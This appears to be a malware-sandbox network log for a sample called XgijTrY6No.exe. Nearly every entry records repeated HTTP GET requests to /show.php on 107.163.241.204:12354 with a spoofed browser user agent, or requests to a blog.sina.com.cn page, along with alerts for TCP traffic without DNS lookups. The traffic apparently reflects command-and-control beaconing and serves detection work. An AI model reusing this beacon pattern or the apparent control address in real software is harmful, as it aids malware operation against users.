Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.204
Source: C:\Users\user\Desktop\XgijTrY6No.exeCode function: 0_2_004026B0 recv,WSAGetLastError,0_2_004026B0
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.204:12354Cache-Control: no-cache
